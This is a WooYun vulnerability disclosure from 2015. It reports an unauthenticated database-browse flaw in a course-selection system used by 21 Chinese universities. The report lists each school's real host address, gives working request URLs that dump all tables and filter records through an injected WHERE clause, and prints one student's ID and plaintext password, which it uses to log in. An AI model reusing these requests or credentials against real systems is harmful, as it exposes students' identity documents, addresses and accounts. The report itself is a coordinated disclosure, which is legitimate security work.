当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126415

漏洞标题:21所高校学生选课系统漏洞泄漏所有在校生毕业生信息(含211,985)

相关厂商:cncert国家互联网应急中心

漏洞作者: xinyue

提交时间:2015-07-16 22:36

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-21: 厂商已经确认,细节仅向厂商公开
2015-07-31: 细节向核心白帽子及相关领域专家公开
2015-08-10: 细节向普通白帽子公开
2015-08-20: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

数据库权限配置漏洞,不登陆可以查询所有在校生毕业生的所有信息(包括身份证,家庭住址,手机号码等等);恶意选课退课

详细说明:

涉及学校21所:
http://219.226.132.31/zhxt_bks/zhxt_bks.html华北电力科技大学
http://222.194.15.1:7777/zhxt_bks/zhxt_bks.html哈工大威海校区
http://web2.tust.edu.cn:7777/zhxt_bks/zhxt_bks.html 天津科技大学
http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html 扬州大学
http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html 中南财经政法大学
http://211.64.120.50/zhxt_bks/zhxt_bks.html 山东交通学院
http://210.44.2.167:7777/zhxt_bks/zhxt_bks.html 山东师范大学
http://jwxt.whcm.edu.cn:8000/zhxt_bks/zhxt_bks.html 武汉音乐学院
http://202.113.80.18:7777/zhxt_bks/zhxt_bks.html 天津商业大学
http://202.207.177.15:7777/zhxt_bks/zhxt_bks.html 中北大学
http://jwweb.yzu.edu.cn:7777/zhxt_bks/zhxt_bks.html 扬州大学
202.121.64.69:7777/zhxt_bks/zhxt_bks.html 上海海洋大学
202.205.107.52:7777/zhxt_bks/zhxt_bks.html石油化工学院
jwcweb.lcu.edu.cn/zhxt_bks/zhxt_bks.html聊城大学
jwgl.lnu.edu.cn/zhxt_bks/zhxt_bks.html辽宁大学
222.66.202.186:7778/zhxt_bks/zhxt_bks.html上海海事大学
http://xuanke.hebut.edu.cn:7777/zhxt_bks/zhxt_bks.html 河北工业大学
210.40.160.37:7777/zhxt_bks/zhxt_bks.html贵阳医学院
http://202.199.184.40/zhxt_bks/zhxt_bks1.html东北大学
http://202.100.210.140:800/zhxt_bks/zhxt_bks.html海南职业技术学院
211.64.120.50/zhxt_bks/zhxt_bks.html山东交通学院
以中南财经政法大学为例,选课系统地址http://202.114.224.81:7777/zhxt_bks/zhxt_bks.html

QQ截图20150713103625.png


数据库所有表 http://202.114.224.81:7777/pls/wwwbks/qcb.table_browse?ctable=all_tables&ntable_type=1&ccolumns=*&cclauses=&nrow_min=1&nrow_max=150
可以看到数据库内所有表格

2.png


其中
学籍信息表

3.png


其他还包括成绩表,登陆密码表等等

漏洞证明:

看一下学籍信息表
http://jwxt.sdu.edu.cn:7890/pls/wwwbks/qcb.table_browse?ctable=XJ_XJB&ntable_type=1&ccolumns=*&cclauses=&nrow_min=1&nrow_max=150
前推至07年毕业生的信息都有

5.png


找一个在校的密码登陆一下
cclause是查询条件,12年入学的查询为cclauses=WHERE%20RXNJ=%272012%27

6.png


得到学号1203080233
从密码表中获得登陆密码931119

MM.png


登陆一下

9.png


学籍信息

10.png


有的系统会存储家庭住址和联系电话:(山东交通学院为例)

11.png


修复方案:

合理分配数据库权限

版权声明:转载请注明来源 xinyue@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-21 09:28

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给赛尔网络,由其后续协调网站管理单位处置。

最新状态:

暂无